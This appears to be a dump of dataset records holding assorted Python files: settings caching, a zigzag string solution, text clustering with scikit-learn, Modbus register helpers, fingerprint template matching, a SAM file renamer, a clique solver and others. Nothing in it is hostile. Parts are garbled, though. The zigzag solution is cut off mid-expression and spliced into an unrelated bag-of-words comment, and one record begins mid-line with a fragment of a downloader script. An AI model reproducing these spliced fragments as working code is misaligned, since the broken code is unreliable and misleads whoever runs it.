settings to cache (more like history...but whatever)\n \"\"\"\n\n cls.reload_settings()\n debug(history)\n for i in history:\n key = i[0]\n value = i[1]\n if value is None or value == \"\":\n continue\n values = cls.cache.get(key, [])\n if value in values:\n values.remove(value)\n values.insert(0, value)\n if len(values) > 20:\n del values[-1]\n cls.cache[key] = values\n for t in toggles:\n key = t[0]\n value = t[1]\n if value is None:\n continue\n cls.cache[key] = value\n for s in strings:\n key = s[0]\n value = s[1]\n if value is None:\n continue\n cls.cache[key] = value\n\n cls.save_cache()\n\n @classmethod\n def get_history_record_count(cls, history_types=[]):\n \"\"\"\n Get number of history items saved\n \"\"\"\n\n cls.reload_settings()\n count = 0\n for h in history_types:\n count += len(cls.cache.get(h, []))\n return count\n\n @classmethod\n def clear_history_records(cls, history_types=[]):\n \"\"\"\n Clear history types\n \"\"\"\n\n cls.reload_settings()\n for h in history_types:\n if cls.cache.get(h, None) is not None:\n cls.cache[h] = []\n cls.save_cache()\n\n @classmethod\n def save_settings(cls):\n \"\"\"\n Save settings\n \"\"\"\n\n try:\n with codecs.open(cls.settings_file, \"w\", encoding=\"utf-8\") as f:\n f.write(json.dumps(cls.settings, sort_keys=True, indent=4, separators=(',', ': ')))\n except:\n e = traceback.format_exc()\n try:\n errormsg(_(\"Failed to save settings file!\"))\n error(e)\n except:\n print(str(e))\n\n @classmethod\n def save_cache(cls):\n \"\"\"\n Save cache\n \"\"\"\n\n try:\n with codecs.open(cls.cache_file, \"w\", encoding=\"utf-8\") as f:\n f.write(json.dumps(cls.cache, sort_keys=True, indent=4, separators=(',', ': ')))\n except:\n e = traceback.format_exc()\n try:\n errormsg(_(\"Failed to save cache file!\"))\n error(e)\n except:\n print(str(e))\n","sub_path":"_gui/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":15757,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"419552366","text":"class Solution(object):\n def convert(self, s, numRows):\n \"\"\"\n :type s: str\n :type numRows: int\n :rtype: str\n \"\"\"\n l = len(s)\n numRows -= 1\n res = \"\"\n if numRows==0: return s\n for i in range(0,l,2*numRows):\n res += s[i]\n if numRows > 1:\n for j in range(1,numRows):\n for k in range(j,l,2*numRows):\n res += s[k]\n if k+2*numRows-2*j mchiene DIST: 2\n\n# Bag-of-Word\n#\n# post1: 'How to format my hard disk'\n# post2: 'Hard disk format problems'\n#\n# Word Post2Count Post2Count\n# disk 1 1\n# format 1 1\n# how 1 0\n# hard 1 1\n# my 1 0\n# problems 0 1\n# to 1 0\n#\n# Vector:\n# post1: [1, 1, 1, 1, 1, 0, 1]\n# post2: [1, 1, 0, 1, 0, 1, 0]\n#\n# Similar Ratio: euler-distance(post1, post2)\n\nimport os\nfrom sklearn.feature_extraction.text import CountVectorizer\n\nvectorizer = CountVectorizer(min_df=1)\nprint(vectorizer)\n\ncontent = [\"How to format my hard disk\", \" Hard disk format problems \"]\nX = vectorizer.fit_transform(content)\nprint(vectorizer.get_feature_names())\nprint(X.toarray().transpose())\n\nDIR = '.'\n\nposts = [open(os.path.join(DIR, f)).read() for f in os.listdir(DIR)]\nX_train = vectorizer.fit_transform(posts)\nnum_samples, num_features = X_train.shape\nprint('#samples: %d, #features: %d' % (num_samples, num_features))\nprint(vectorizer.get_feature_names())\n\n# feature vector\nprint(X_train.getrow(3).toarray())\nprint(X_train.getrow(4).toarray())\n\n# stem extract\nimport nltk.stem\n\ns = 
nltk.stem.SnowballStemmer('english')\nprint(s.stem(\"graphics\"))\nprint(s.stem(\"imaging\"))\nprint(s.stem(\"image\"))\nprint(s.stem(\"imagination\"))\nprint(s.stem(\"imagine\"))\n\n# NLTK stemmed CountVectorizer\nenglish_stemmer = nltk.stem.SnowballStemmer('english')\n\n\nclass StemmedCountVectorizer(CountVectorizer):\n    def build_analyzer(self):\n        analyzer = super(StemmedCountVectorizer, self).build_analyzer()\n        return lambda doc: (english_stemmer.stem(w) for w in analyzer(doc))\n\n\nvectorizer = StemmedCountVectorizer(min_df=1, stop_words='english')\n\nprint(vectorizer)\n\n# stop word boost (TF-IDF)\nimport math\nimport scipy as sp\n\n\ndef tfidf(term, doc, docset):\n    # term frequency: the term's count over the document's total token count\n    tf = float(doc.count(term))/sum(doc.count(w) for w in set(doc))\n    # inverse document frequency over the whole corpus\n    idf = math.log(float(len(docset))/(len([doc for doc in docset if term in doc])))\n    return tf * idf\n\n\na, abb, abc = [\"a\"], [\"a\", \"b\", \"b\"], [\"a\", \"b\", \"c\"]\nD = [a, abb, abc]  # the corpus is a list of documents, not a flat token list\nprint(tfidf(\"a\", a, D))\nprint(tfidf(\"b\", abb, D))\nprint(tfidf(\"a\", abc, D))\nprint(tfidf(\"b\", abc, D))\nprint(tfidf(\"c\", abc, D))\n\n# Cluster\n#\n# flat cluster\n# hierarchy cluster\n#\n# sklearn.cluster\n# http://scikit-learn.org/dev/modules/clustering.html\n\nfrom sklearn.feature_extraction.text import TfidfVectorizer\n\n\nclass StemmedTfidfVectorizer(TfidfVectorizer):\n    def build_analyzer(self):\n        # call our own superclass chain, not TfidfVectorizer's parent\n        analyzer = super(StemmedTfidfVectorizer, self).build_analyzer()\n        return lambda doc: (english_stemmer.stem(w) for w in analyzer(doc))\n\n\nvectorizer = StemmedTfidfVectorizer(min_df=1, stop_words='english')\nprint(vectorizer)\n","sub_path":"refs/machinelearning/posts/cluster.py","file_name":"cluster.py","file_ext":"py","file_size_in_byte":2917,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"368822704","text":"#!/usr/bin/env python\n\n'''\n\n\n'''\n\nfrom FlclModbus.util import int_to_bytes, bytes_to_int\n\n\nHOLDING_REGISTER='holding'\nCOIL='coil'\nINPUT_REGISTER='input'\nDISCRETE_INPUT='discrete_input'\n\nREGISTER_TYPES = {\n    COIL: {\n        'offset':1,\n        'read_one': 'read_coils',\n        'write_one': 'write_coil',\n        'read_multi': 'read_coils',\n        'write_multi': 'write_coils'\n    },\n    DISCRETE_INPUT: {\n        'offset':10001,\n        'read_one': 'read_discrete_inputs',\n        'read_multi': 'read_discrete_inputs',\n    },\n    INPUT_REGISTER: {\n        'offset':30001,\n        'read_one': 'read_input_registers',\n        'read_multi': 'read_input_registers',\n    },\n    HOLDING_REGISTER: {\n        'offset':40001,\n        'read_one': 'read_holding_registers',\n        'write_one': 'write_register',\n        'read_multi': 'read_holding_registers',\n        'write_multi': 'write_registers'\n    }\n}\n\n\nclass ModbusData(object):\n\n\n    def __init__(self, type, address, value, unit=0x01):\n        self.type=type\n        self.address=address\n        self.value=value\n        self.unit=unit\n        self.number=self.address+REGISTER_TYPES.get(type).get('offset')\n\n\n    def get_type_description(self):\n        return REGISTER_TYPES.get(self.type)\n\n\n    def get_number(self):\n        return self.number\n\n\nclass ModbusRegister(ModbusData):\n\n\n    def __init__(self, type, address, value=0, unit=0x01):\n        ModbusData.__init__(self, type, address, value, unit=unit)  # forward the caller's unit instead of hard-coding 0x01\n        # keep a zero-padded 16-bit binary string so get_bit_at() indexing stays in range\n        self.bin_value = format(value, '016b')\n\n\n    def get_bit_at(self,pos=0):\n        if pos >= 0 and pos <16:\n            return int(self.bin_value[abs(pos-15)])\n        else:\n            return -1\n\n\n    def set_value(self, value):\n        self.bin_value = format(value, '016b')\n        
self.value=value\n\n\n\nclass ModbusSingle(ModbusData):\n\n\n    def __init__(self, type, address, value=False, unit=0x01):\n        ModbusData.__init__(self, type, address, value, unit=unit)  # forward the caller's unit instead of hard-coding 0x01\n\n\nclass ModbusCoil(ModbusSingle):\n\n\n    def __init__(self, address, value=False, unit=0x01):\n        ModbusSingle.__init__(self, COIL, address,\n                              value=value, unit=unit)\n\n\n    def set_value(self, value):\n        self.value=value\n\n\nclass ModbusDiscreteInput(ModbusSingle):\n\n\n    def __init__(self, address, value=False, unit=0x01):\n        ModbusSingle.__init__(self, DISCRETE_INPUT, address,\n                              value=value, unit=unit)\n\n\nclass ModbusInputRegister(ModbusRegister):\n\n\n    def __init__(self, address, value=0, unit=0x01):\n        ModbusRegister.__init__(self, INPUT_REGISTER, address,\n                                value=value, unit=unit)\n\n\nclass ModbusHoldingRegister(ModbusRegister):\n\n\n    def __init__(self, address, value=0, unit=0x01):\n        ModbusRegister.__init__(self, HOLDING_REGISTER, address,\n                                value=value, unit=unit)\n\n\n    def set_bit_value(self, pos, val):\n        p = 0\n        prev = self.bin_value\n        new = ''\n        while p < 16:\n            if p == abs(pos-15):\n                v = val\n            else:\n                v = self.bin_value[p]\n            new = '{}{}'.format(new,v)\n            p=p+1\n        self.bin_value = new\n        self.value = int(new,2)\n\n\nclass ModbusRegisterFormatter(object):\n\n\n    @staticmethod\n    def set_int_in_register(value, register):\n        register.set_value(value)\n        return register\n\n\n    @staticmethod\n    def set_int_in_register_list(value, registers):\n        il=int_to_bytes(value, len(registers))\n        for i in range(0, len(registers)):\n            registers[i].value=il[i]\n        return registers\n\n\n    @staticmethod\n    def set_float_in_register(value, register, coef):\n        val=int(value*coef)\n        return ModbusRegisterFormatter.set_int_in_register(val, register)\n\n\n    @staticmethod\n    def set_float_in_register_list(value, registers, coef):\n        val=int(value*coef)\n        return ModbusRegisterFormatter.set_int_in_register_list(val, registers)\n\n\n    @staticmethod\n    def set_bool_in_register(value, register):\n        if value==True:\n            register.set_value(0x01)\n        else:\n            register.set_value(0x00)\n        return register\n\n\n    @staticmethod\n    def set_bool_in_register_at(value, register, pos):\n        if value==True:\n            v=1\n        else:\n            v=0\n        try:\n            register.set_bit_value(pos, v)\n        except:\n            pass\n        return register\n\n\n    @staticmethod\n    def make_int_from_register(register):\n        return int(register.value)\n\n\n    @staticmethod\n    def make_int_from_list(registers):\n        l=[]\n        for reg in registers:\n            l.append(reg.value)\n        return bytes_to_int(l)\n\n\n    @staticmethod\n    def make_float_from_register(register, coef):\n        return float(register.value)/float(coef)\n\n\n    @staticmethod\n    def make_float_from_list(registers, coef):\n        fv=float(ModbusRegisterFormatter.make_int_from_list(registers))\n        return fv /float(coef)\n\n\n    @staticmethod\n    def make_boolean_from_bit(register, pos):\n        v=register.get_bit_at(pos)\n        return v==1\n\n\n    @staticmethod\n    def make_boolean_from_register(register):\n        return register.value>0\n","sub_path":"FlclModbusService/src/FlclModbus/FlclModbusRegister.py","file_name":"FlclModbusRegister.py","file_ext":"py","file_size_in_byte":5385,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"56854631","text":"\"\"\"\n * author - Akshay Tekam\n * date - ${DATE}\n * time - ${TIME}\n * package - ${PACKAGE_NAME}\n * Title - prints the Euclidean distance from the\n   point(x,y)to the origin(0,0).\n\"\"\"\nimport math\nclass Distance:\n    # calculate distance between two points.\n    def findDistance(self):\n\n        p1 = [4, 2]\n        p2 = [0, 0]\n\n        # Formula for 
Euclidean distance\n distance = math.sqrt(((p1[0] - p2[0]) ** 2) + ((p1[1] - p2[1]) ** 2))\n print(distance)\nobj=Distance()\nobj.findDistance()\n","sub_path":"DistanceBetTwoPoint.py","file_name":"DistanceBetTwoPoint.py","file_ext":"py","file_size_in_byte":519,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"282454978","text":"from ctypes import *\nfrom users.APIs.dpfj import *\nfrom users.APIs.dpfpdd import *\nfrom users.models import Client\n\nso_file = \"C:/Apache24/htdocs/myenv/conequi-deploy/users/APIs/lib/windows/x64/dpfpdd\"\ndpfpdd = CDLL(so_file)\nso_file = \"C:/Apache24/htdocs/myenv/conequi-deploy/users/APIs/lib/windows/x64/dpfj\"\ndpfj = CDLL(so_file)\n\ndef CaptureFinger(szFingerName, hReader, nFtType, ppFt, pFtSize):\n result = c_int(0)\n ppFt = c_void_p\n pFtSize = 0\n\n cparam = DPFPDD_CAPTURE_PARAM(0)\n cparam.size = sizeof(cparam)\n cparam.image_fmt = DPFPDD_IMG_FMT_ISOIEC19794\n cparam.image_proc = DPFPDD_IMG_PROC_NONE\n cparam.image_res = 500\n \n cresult = DPFPDD_CAPTURE_RESULT(0)\n cresult.size = sizeof(cresult)\n cresult.info.size = sizeof(cresult.info)\n \n nImageSize = c_uint(0)\n \n dpfpdd.dpfpdd_capture.arftypes = [DPFPDD_DEV,POINTER(DPFPDD_CAPTURE_PARAM),c_uint,POINTER(DPFPDD_CAPTURE_RESULT),POINTER(c_uint),POINTER(c_ubyte)]\n dpfpdd.dpfpdd_capture.restypes = c_int\n dpfpdd.dpfpdd_capture(hReader,byref(cparam),0,byref(cresult),byref(nImageSize),None)\n \n pImage = (c_ubyte*139990)(*b'')\n \n\n while(1):\n is_ready = 0\n while(1):\n ds = DPFPDD_DEV_STATUS()\n ds.size = sizeof(DPFPDD_DEV_STATUS)\n result = dpfpdd.dpfpdd_get_device_status(hReader, byref(ds))\n if(DPFPDD_SUCCESS != result):\n return \"dpfpdd_get_device_status()\"\n break\n if(DPFPDD_STATUS_READY == ds.status or DPFPDD_STATUS_NEED_CALIBRATION == ds.status):\n is_ready = 1\n break\n \n if (is_ready == 0):\n break\n\n #print(\"Put\", szFingerName,\" on the reader, or press Ctrl-C to cancel...\")\n result = dpfpdd.dpfpdd_capture(hReader, byref(cparam), -1, byref(cresult), byref(nImageSize), pImage)\n \n if(DPFPDD_SUCCESS != result):\n return \"Erro dpfpdd_capture()\"\n else:\n if cresult.success:\n #print(\"fingerprint captured\")\n nFeaturesSize = c_uint(MAX_FMD_SIZE)\n \n pFeatures = (c_ubyte*1562)(*b'')\n\n dpfj.dpfj_create_fmd_from_fid.argtypes = [DPFJ_FID_FORMAT,POINTER(c_ubyte),c_uint,DPFJ_FMD_FORMAT,POINTER(c_ubyte),POINTER(c_uint)]\n dpfj.dpfj_create_fmd_from_fid.restypes = c_int\n result = dpfj.dpfj_create_fmd_from_fid(DPFJ_FID_ISO_19794_4_2005, pImage, nImageSize, nFtType, pFeatures, byref(nFeaturesSize))\n if(DPFJ_SUCCESS == result):\n ppFt = pFeatures\n pFtSize = nFeaturesSize\n \n #print(\"features extracted.\")\n break\n return result, ppFt, pFtSize\n \n \n\n\n\ndef Verification(hReader):\n pFeatures1 = c_ubyte()\n nFeatures1Size = c_uint(0)\n pFeatures2= c_ubyte()\n nFeatures2Size = c_uint(0)\n\n bStop = False\n while(bStop != True):\n #print(\"Verification started\")\n result, pFeatures1, nFeatures1Size = CaptureFinger(\"any finger\", hReader, DPFJ_FMD_ISO_19794_2_2005, byref(pFeatures1), byref(nFeatures1Size))\n \n if result == 0:\n users= Client.objects.filter(fingerprint__contains='FMR')\n #print(users)\n result = 0\n if result == 0:\n falsematch_rate = c_uint(0)\n for user in users:\n #print(user.usuario)\n res = [] \n for ele in user.fingerprint:\n res.extend(ord(num) for num in ele)\n pFeatures2 = (c_ubyte * len(res))(*res)\n #print(pFeatures2)\n nFeatures2Size = sizeof(pFeatures2) \n dpfj.dpfj_compare.argtypes = 
[DPFJ_FMD_FORMAT,POINTER(c_ubyte),c_uint,c_uint,DPFJ_FMD_FORMAT,POINTER(c_ubyte),c_uint,c_uint,POINTER(c_uint)]\n dpfj.dpfj_compare.restype = c_int\n result = dpfj.dpfj_compare(DPFJ_FMD_ISO_19794_2_2005, pFeatures1, nFeatures1Size, 0, DPFJ_FMD_ISO_19794_2_2005, pFeatures2, nFeatures2Size, 0, byref(falsematch_rate))\n \n if(DPFJ_SUCCESS == result):\n #target_falsematch_rate = c_long(21474.83647)\n #print(falsematch_rate)\n if(falsematch_rate.value == 0):\n #print(\"Fingerprints matched.\")\n #print(user.usuario)\n return user.usuario\n\n else:\n #print(\"Fingerprints did not match.\")\n continue\n else:\n print(\"ouraoura\")\n return \"Erro dpfj_compare()\"\n return \"N\"\n else: \n return \"Error\"\n bStop = True\n\n\n\n\n# Defining main function \ndef main(tipo):\n #Inicializar\n\n #dpfpdd.dpfpdd_exit()\n \n result = dpfpdd.dpfpdd_init()\n if(DPFPDD_SUCCESS == result): \n #print(\"calling dpfpdd_init()\")\n #print(\"----------------------\")\n\n\n #Informações sobre o leitor\n dev_cnt = c_uint(2)\n dev_infos = DPFPDD_DEV_INFO()\n dpfpdd.dpfpdd_query_devices.argtypes = [POINTER(c_uint),POINTER(DPFPDD_DEV_INFO)]\n dpfpdd.dpfpdd_query_devices.restype = c_int\n result = dpfpdd.dpfpdd_query_devices(dev_cnt,byref(dev_infos))\n #print(dev_cnt)\n #print(result)\n if(DPFPDD_SUCCESS == result):\n #print(\"Varredura Completa\")\n #print(\"----------------------\")\n #printf(b\"Nome do dispositivo conectado: %s\\n\", dev_infos.name)\n #print(\"----------------------\")\n #Inicia o leitor\n pdev = DPFPDD_DEV()\n dev_name = dev_infos.name\n #dpfpdd.dpfpdd_close(pdev)\n dpfpdd.dpfpdd_open.argtypes = [POINTER(c_char),POINTER(DPFPDD_DEV)]\n dpfpdd.dpfpdd_open.restype = c_int\n result = dpfpdd.dpfpdd_open(dev_name,byref(pdev))\n #result = dpfpdd.dpfpdd_open_ext(dev_name, DPFPDD_PRIORITY_EXCLUSIVE, byref(pdev))\n #print(dev_name)\n #print(result)\n if(DPFPDD_SUCCESS == result):\n #print(\"Dispositivo Selecionado\")\n #print(\"----------------------\")\n\n #funcionalidades do leitor\n dev_caps = DPFPDD_DEV_CAPS(60)\n dpfpdd.dpfpdd_get_device_capabilities.argtypes = [DPFPDD_DEV,POINTER(DPFPDD_DEV_CAPS)]\n dpfpdd.dpfpdd_get_device_capabilities.restype = c_int\n if DPFPDD_SUCCESS == dpfpdd.dpfpdd_get_device_capabilities(pdev,dev_caps):\n #print(\"Funcionalidades adquiridas\")\n #print(\"dpi do leitor: \",dev_caps.resolutions[0])\n #print(\"----------------------\")\n \n if tipo == \"Verification\":\n result = Verification(pdev)\n else:\n pFeatures1 = c_ubyte()\n nFeatures1Size = c_uint(0) \n result, pFeatures1, nFeatures1Size = CaptureFinger(\"any finger\", pdev, DPFJ_FMD_ISO_19794_2_2005, byref(pFeatures1), byref(nFeatures1Size))\n if(DPFPDD_SUCCESS == result):\n #converte\n result = ''.join(chr(i) for i in pFeatures1)\n else:\n result = \"Erro ao adquirir impressão\"\n \n \n\n else:\n return \"Erro ao adiquirir Funcionalidades\"\n \n else:\n return \"Erro ao selecionar dispositivo.\"\n \n #Fecha o despositivo\n dpfpdd.dpfpdd_close.argtypes = [DPFPDD_DEV]\n #print(\"fechou\")\n dpfpdd.dpfpdd_close.restype = c_int\n if DPFPDD_SUCCESS != dpfpdd.dpfpdd_close(pdev):\n return \"Erro ao encerrar\"\n #print(\"----------------------\")\n\n\n else:\n return \"Erro ao fazer varredura\"\n #print(\"----------------------\")\n \n #Finalizar\n dpfpdd.dpfpdd_exit()\n return result\n\n else: return \"Erro when calling dpfpdd_init()\" 
\n","sub_path":"users/APIs/fingerPrint.py","file_name":"fingerPrint.py","file_ext":"py","file_size_in_byte":8414,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"9177455","text":"'''\nnoisy\n=====\n\nThis is an example program that accompanies pyglet (http://www.pyglet.org).\nDue to licensing restrictions on some of the assets, this game cannot be used\nfor commercial purposes.\n\nThe source code is licensed under the BSD license.\n\nAll artwork is Copyright 2007 Alex Holkner.\nThe sound is licensed under Creative Commons Sampling License:\n\n\"ball.wav\"\nby opm (http://freesound.iua.upf.edu/usersViewSingle.php?id=1622)\n RS_set2.wav (http://freesound.iua.upf.edu/samplesViewSingle.php?id=2096)\n\n\nThis is a simple demonstration of how pyglet efficiently manages many sound\nchannels without intervention.\n'''\n\nimport os\nimport random\nimport sys\n\nfrom pyglet.gl import *\nfrom pyglet.window import Window\nfrom pyglet.window import key\nfrom pyglet import image\nfrom pyglet import clock\nfrom pyglet import media\nfrom pyglet import font\n\nPKG = os.path.dirname(__file__)\nBALL_IMAGE = os.path.join(PKG, 'ball.png')\nBALL_SOUND = os.path.join(PKG, 'ball.wav')\n\nif len(sys.argv) > 1:\n BALL_SOUND = sys.argv[1]\n\nwindow = Window(640, 480)\nsound = media.load(BALL_SOUND, streaming=False)\n\nclass Ball(object):\n ball_image = image.load(BALL_IMAGE)\n width = ball_image.width\n height = ball_image.height\n def __init__(self):\n self.x = random.random() * (window.width - self.width)\n self.y = random.random() * (window.height - self.height)\n self.dx = (random.random() - 0.5) * 1000\n self.dy = (random.random() - 0.5) * 1000\n\n def update(self, dt):\n if self.x <= 0 or self.x + self.width >= window.width:\n self.dx *= -1\n sound.play()\n if self.y <= 0 or self.y + self.height >= window.height:\n self.dy *= -1\n sound.play()\n self.x += self.dx * dt\n self.y += self.dy * dt\n\n self.x = min(max(self.x, 0), window.width - self.width)\n self.y = min(max(self.y, 0), window.height - self.height)\n\n def draw(self):\n self.ball_image.blit(self.x, self.y, 0)\n\nballs = []\n\n@window.event\ndef on_key_press(symbol, modifiers):\n if symbol == key.SPACE:\n balls.append(Ball())\n elif symbol == key.BACKSPACE:\n if balls:\n del balls[-1]\n elif symbol == key.ESCAPE:\n window.has_exit = True\n\nif __name__ == '__main__':\n glEnable(GL_BLEND)\n glBlendFunc(GL_SRC_ALPHA, GL_ONE_MINUS_SRC_ALPHA)\n\n label = font.Text(font.load('Arial', 14),\n 'Press space to add a ball, backspace to remove.',\n window.width / 2, 10,\n halign=font.Text.CENTER)\n\n while not window.has_exit:\n window.dispatch_events()\n media.dispatch_events()\n dt = clock.tick()\n\n glClear(GL_COLOR_BUFFER_BIT)\n for ball in balls:\n ball.update(dt)\n ball.draw()\n label.draw()\n\n window.flip()\n\n","sub_path":"crunchy/server_root/examples/pyglet_test.py","file_name":"pyglet_test.py","file_ext":"py","file_size_in_byte":2803,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"557645139","text":"import numpy as np\nimport torch\nfrom torch import nn\nfrom config import args\nimport cv2\nfrom torchvision import transforms\nfrom model.utils import PILImageToCv,CVImageToPIL,reverse_one_hot\nfrom data_reader.utils import imshow\nfrom datetime import datetime\n\n\ndef loss(logit,label,num_classes):\n #logit.shape=[N2,num_classes,h2,w2],label.shape=[N1,3,h1,w1]\n num_classes_tensor=torch.full(label.shape,num_classes).cuda()\n 
#num_classes_tensor=num_classes_tensor.permute([0, 3, 1, 2])\n\n label_nignore=label 4) :\r\n pass\r\n threading._start_new_thread(downloadCeleb, (index, celeb, finished))\r\n\r\nwhile( finished.count('not')): \r\n pass\r\n","sub_path":"myscraper.py","file_name":"myscraper.py","file_ext":"py","file_size_in_byte":3022,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"33624044","text":"#!/usr/bin/env python3\n\nimport argparse\nimport sys\n\n\ndef get_args():\n\tap = argparse.ArgumentParser(description=\"rename reference sequence names in SAM file to fulfill the picky \"\n\t\t\"flavour of anvi'o: a redemption if you forgot to reformat the names \"\n\t\t\"before mapping\")\n\tap.add_argument(\"input\", type=str, nargs=\"?\", default=\"-\",\n\t\thelp=\"input sam file (default: stdin)\")\n\tap.add_argument(\"-o\", \"--output\", type=str,\n\t\tmetavar=\"file\", default=\"-\", required=False,\n\t\thelp=\"output sam file (default: stdout)\")\n\tap.add_argument(\"--rename-table\", type=str,\n\t\tmetavar=\"file\", default=None, required=False,\n\t\thelp=\"if used, report the renaming table (default: off)\")\n\targs = ap.parse_args()\n\treturn args\n\n\nclass SeqNameEncoder(dict):\n\tdef encode(self, seq_name):\n\t\t\"\"\"\n\t\tencode an input seq name, return a string (new name) in format\n\t\ts_0000000000000001, s_0000000000000002, ...\n\t\tif the input header has been encountered previously, old result will be\n\t\treturned\n\t\t\"\"\"\n\t\treturn \"s_%016u\" % self.get_sid(seq_name)\n\n\tdef get_sid(self, seq_name):\n\t\t\"\"\"\n\t\treturn an integral seq id;\n\t\treturn the existing result if encountered previously\n\t\t\"\"\"\n\t\tsid = self.setdefault(seq_name, len(self) + 1)\n\t\t# debug\n\t\t# assert isinstance(sid, int), sid\n\t\treturn sid\n\n\nclass SAMStreamRenamer(object):\n\tclass SAMAlignemtRecord(list):\n\t\t@property\n\t\tdef rname(self):\n\t\t\treturn self[2]\n\n\t\t@rname.setter\n\t\tdef rname(self, _value):\n\t\t\tself[2] = _value\n\t\t\treturn\n\n\t\t@property\n\t\tdef rnext(self):\n\t\t\treturn self[6]\n\n\t\t@rnext.setter\n\t\tdef rnext(self, _value):\n\t\t\tself[6] = _value\n\t\t\treturn\n\n\tdef __init__(self, *ka, **kw):\n\t\tsuper(SAMStreamRenamer, self).__init__(*ka, **kw)\n\t\tself.encoder = SeqNameEncoder()\n\t\treturn\n\n\tdef _process_refseq(self, line) -> str:\n\t\t\"\"\"\n\t\trename a refseq's SN tag\n\t\t\"\"\"\n\t\tsp = line.split(\"\\t\") # is the only valid separator in SAM\n\t\tfor i, s in enumerate(sp):\n\t\t\tif s.startswith(\"SN:\"):\n\t\t\t\tsp[i] = \"SN:\" + self.encoder.encode(s[3:])\n\t\t\t\tbreak\n\t\treturn (\"\\t\").join(sp)\n\n\tdef _process_alignment(self, line) -> str:\n\t\t\"\"\"\n\t\trename an alignment record's RNAME and RNEXT fields\n\t\t\"\"\"\n\t\tif not line:\n\t\t\treturn line\n\t\taln = self.SAMAlignemtRecord(line.split(\"\\t\"))\n\t\tif aln.rname != \"*\":\n\t\t\t# '*' is missing, no changes made\n\t\t\taln.rname = self.encoder.encode(aln.rname)\n\t\tif (aln.rnext != \"*\") and (aln.rnext != \"=\"):\n\t\t\t# '*' is missing, '=' indicates identical to self.rname\n\t\t\t# in both cases, no changes made\n\t\t\taln.rnext = self.encoder.encode(aln.rnext)\n\t\treturn (\"\\t\").join(aln)\n\n\tdef process_line(self, sam_line):\n\t\t\"\"\"\n\t\tonly respond to the reference seqs and alignment section lines; change\n\t\treference seq names in those lines using self.encoder; other irrelavent\n\t\tlines will directly pass through;\n\t\t\"\"\"\n\t\tsam_line = sam_line.rstrip() # get rid of 
EOL\n\t\tif sam_line.startswith(\"@SQ\"):\n\t\t\treturn self._process_refseq(sam_line)\n\t\telif sam_line.startswith(\"@\"):\n\t\t\t# other header lines are returned without change\n\t\t\treturn sam_line\n\t\telse:\n\t\t\t# rest are alignment records\n\t\t\treturn self._process_alignment(sam_line)\n\n\ndef main():\n\targs = get_args()\n\tifp = (sys.stdin if args.input == \"-\" else open(args.input, \"r\"))\n\tofp = (sys.stdout if args.output == \"-\" else open(args.output, \"w\"))\n\trn = SAMStreamRenamer()\n\tfor line in ifp:\n\t\tofp.write(rn.process_line(line) + \"\\n\")\n\tif args.rename_table:\n\t\twith open(args.rename_table, \"w\") as fp:\n\t\t\tfor key in rn.encoder.keys():\n\t\t\t\tfp.write(\"%s\\t%s\\n\" % (key, rn.encoder.encode(key)))\n\tifp.close() # safe for stdin/stdout\n\tofp.close()\n\treturn\n\n\nif __name__ == \"__main__\":\n\tmain()\n","sub_path":"stream_sam_refseq_renamer.py","file_name":"stream_sam_refseq_renamer.py","file_ext":"py","file_size_in_byte":3535,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"218401600","text":"def train(timesteps, env, eval_env, evaluate_every, evaluate_num, agent, logger, state):\n    import numpy as np\n    for timestep in range(timesteps):\n        action = agent.step(state)\n        next_state, reward, done = env.step(action)\n        ts = (state, action, reward, next_state, done)\n        agent.feed(ts)\n        # advance the training state; restart the episode once it ends\n        # (assumes env.reset() exists, mirroring eval_env.reset() below)\n        state = next_state if not done else env.reset()\n\n        if timestep % evaluate_every == 0:\n            rewards = []\n            # evaluate on eval_env with its own state so training state is not clobbered\n            eval_state = eval_env.reset()\n            for _ in range(evaluate_num):\n                action, _ = agent.eval_step(eval_state)\n                eval_state, reward, done = eval_env.step(action)\n                if done:\n                    rewards.append(reward)\n                    eval_state = eval_env.reset()\n            logger.log_performance(env.timestep, np.mean(rewards))\n\n","sub_path":"r/leduc_single_agent/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":748,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"225914339","text":"'''\n\tProblem Url: https://www.hackerrank.com/challenges/clique/problem\n\tIdea: Turan's Theorem\n\tTurán's theorem states that if a graph on n vertices doesn't contain\n\tan (r+1)-clique then it has at most ⌊(r-1)*n*n/(2*r)⌋ edges\n\n\tfor large values:\n\t\tm* = (N*N - (N%r)*NR*NR - (r - (N%r))*nr*nr)/2\n'''\n\nimport math\n\ndef predicate(r):\n\tNR = math.ceil(N/r)\n\tnr = math.floor(N/r)\n\t\n\tm = (N*N - (N%r)*NR*NR - (r - (N%r))*nr*nr)/2\n\t# m = (r-1)*N*N/(2*(r))\n\treturn E > int(m)\n\ndef bs(l, r):\n\twhile l < r:\n\t\tm = l + r + 1 >> 1\n\t\tif predicate(m):\n\t\t\tl = m\n\t\telse:\n\t\t\tr = m - 1\n\treturn l\n\nt = int(input())\n\nfor _ in range(t):\n\tN, E = map(int, input().split())\n\tans = bs(0, N)\n\tprint(ans+1)","sub_path":"Hackerrank/hackerrank_(clique).py","file_name":"hackerrank_(clique).py","file_ext":"py","file_size_in_byte":681,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"48134833","text":"import httmock\nimport json\nimport os\nfrom server.lib.manifest import Manifest,\\\n    clean_workspace_path\nfrom tests import base\n\n\ndef setUpModule():\n    base.enabledPlugins.append('wholetale')\n    base.startServer()\n\n\ndef tearDownModule():\n    base.stopServer()\n\n\nclass ManifestTestCase(base.TestCase):\n\n    def setUp(self):\n        super(ManifestTestCase, self).setUp()\n        users = ({\n            'email': 'root@dev.null',\n            'login': 'admin',\n            'firstName': 